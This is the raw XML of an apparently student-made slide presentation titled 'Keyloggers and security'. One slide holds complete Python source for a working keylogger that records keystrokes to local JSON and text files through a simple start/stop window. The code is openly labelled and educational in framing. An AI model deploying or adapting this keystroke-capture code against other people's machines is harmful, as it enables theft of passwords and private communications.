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79" d="100"/>
          <a:sy n="79"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4/13/2024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2952689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7983058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0960613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7561402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913251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9666348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7798410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3317048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2720201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0859215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3073219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51989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2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2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2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6" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="446534" y="3085764"/>
            <a:ext cx="11298933" cy="3338149"/>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17" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581191" y="1020431"/>
            <a:ext cx="10993550" cy="14750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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581194" y="2495445"/>
            <a:ext cx="10993546" cy="59032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4/13/2024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492181563"/>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015120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863281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14658905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5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5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5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6" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="49285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7" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581193" y="1391479"/>
            <a:ext cx="5194767" cy="446957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48" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="6416039" y="1391479"/>
            <a:ext cx="5194768" cy="446957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49"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0"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51"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313964350"/>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70"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69"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6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64"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65"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6"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67"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61171073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363917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785252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884688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245509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784581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9728007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578906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802325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1189199448"/>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6070" indent="-306070"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6070"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2060" indent="-234315"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2104" indent="-234315"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20027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e</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y</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l</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o</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g</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g</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e</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r</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s</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 </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a</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n</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d</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 </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s</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e</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c</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u</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r</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i</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t</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y</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977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1.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VILLARASAN. </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KI</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NG</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S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EN</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GI</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NE</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ER</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ING C</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O</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L</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L</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E</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G</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E</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C</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S</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E</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26944826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6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25351756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2"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8541380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90945137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1508194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Preprocessing:</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preprocess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9373802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30599944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84716183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581193" y="729658"/>
            <a:ext cx="11029616" cy="492855"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="02A5E3"/>
          </a:solidFill>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>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a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>t</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7" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="295836" y="1601516"/>
            <a:ext cx="5194767" cy="4469572"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>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import tkinter as tk</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from tkinter import *</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from pynput import keyboard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import json</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keys_used = []</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flag = False</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keys = ""</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def generate_text_log(key):</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with open('key_log.txt', "w+") as keys:</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keys.write(key)</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def generate_json_file(keys_used):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with open('key_log.json', '+wb') as key_log:</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key_list_bytes = json.dumps(keys_used).encode()</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key_log.write(key_list_bytes)</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def on_press(key):</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global flag, keys_used, keys</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if flag == False:</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keys_used.append(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{'Pressed': f'{key}'}</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flag = True</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if flag == True:</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keys_used.append(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{'Held': f'{key}'}</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generate_json_file(keys_used)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def on_release(key):</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global flag, keys_used, keys</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keys_used.append(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{'Released': f'{key}'}</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if flag == True:</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flag = False</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generate_json_file(keys_used)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keys = keys + str(key)</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generate_text_log(str(keys))</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def start_keylogger():</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global listener</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listener = keyboard.Listener(on_press=on_press, on_release=on_release)</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listener.start()</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label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</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start_button.config(state='disabled')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stop_button.config(state='normal')</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def stop_keylogger():</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global listener</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listener.stop()</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label.config(text="Keylogger stopped.")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start_button.config(state='normal')</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    stop_button.config(state='disabled')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root = Tk()</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root.title("Keylogger")</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label = Label(root, text='Click "Start" to begin keylogging.')</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label.config(anchor=CENTER)</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label.pack()</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start_button = Button(root, text="Start", command=start_keylogger)</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start_button.pack(side=LEFT)</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stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</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stop_button.pack(side=RIGHT)</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root.geometry("250x250")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306070" indent="-306070" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>root.mainloop()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="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5099909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43208163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61"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8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8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692033325"/>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Keyloggers and security</dc:title>
  <dc:creator>Vaibhav Ostwal</dc:creator>
  <cp:lastModifiedBy>root</cp:lastModifiedBy>
  <cp:revision>0</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-09T06:27:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-13T01:56:00Z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y fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>7a7c519ad0554087ba2849901c103f39</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOProductBuildVer">
    <vt:lpwstr>1033-0.0.0.0</vt:lpwstr>
  </property>
</Properties>
</file>